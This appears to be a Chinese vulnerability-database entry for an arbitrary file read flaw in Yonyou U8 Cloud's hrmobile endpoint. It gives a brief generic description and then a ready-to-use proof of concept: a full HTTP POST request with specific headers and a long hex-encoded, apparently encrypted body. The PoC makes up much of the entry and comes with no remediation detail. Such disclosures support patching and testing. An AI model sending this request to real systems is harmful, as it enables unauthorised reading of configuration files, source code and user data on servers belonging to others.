用友 U8 Cloud hrmobile 任意文件读取漏洞

日期: 2025-04-21 | 影响软件: 用友U8+ | POC: 已公开

漏洞描述

文件读取漏洞是指攻击者通过某种方式获取对系统文件的读取权限,从而访问敏感信息,如配置文件、源代码、用户数据等。这种漏洞通常是由于应用程序未正确实施权限控制或者未对用户输入进行充分过滤和验证导致的。

PoC代码

POST /u8cloud/hrmobile HTTP/1.1
Content-Type: text/plain
mcode: ssss
language: zh_CN
appcode: 12444
pkcorp: 0001
pkuser: 0001

4F96A911CD5C59F6A15C7E3ACD7968616A55957C0051D39786339CE1A2818670212BE1E9BEDDE8692B1211D74EAA8A79301485F94362ED1BABE47104695C7CD10D8CC66E97E8F5B0E3D25D41E8721E942E02ED95727D8B24A1352F9E9D979A8207D147A03A658DE2EE7696518F5262C8EA373A35F6AED7E0C71F9D0BBEA9B3BEB0F08C5FB05FE50D3FD4770CA7ECACABA7E8C79ACA76F922F8D7AFA0D304E0525E54332EFD559A1AF8E1381BFEA1E54B0625739B79E62049896E7C56D005DA15

相关漏洞推荐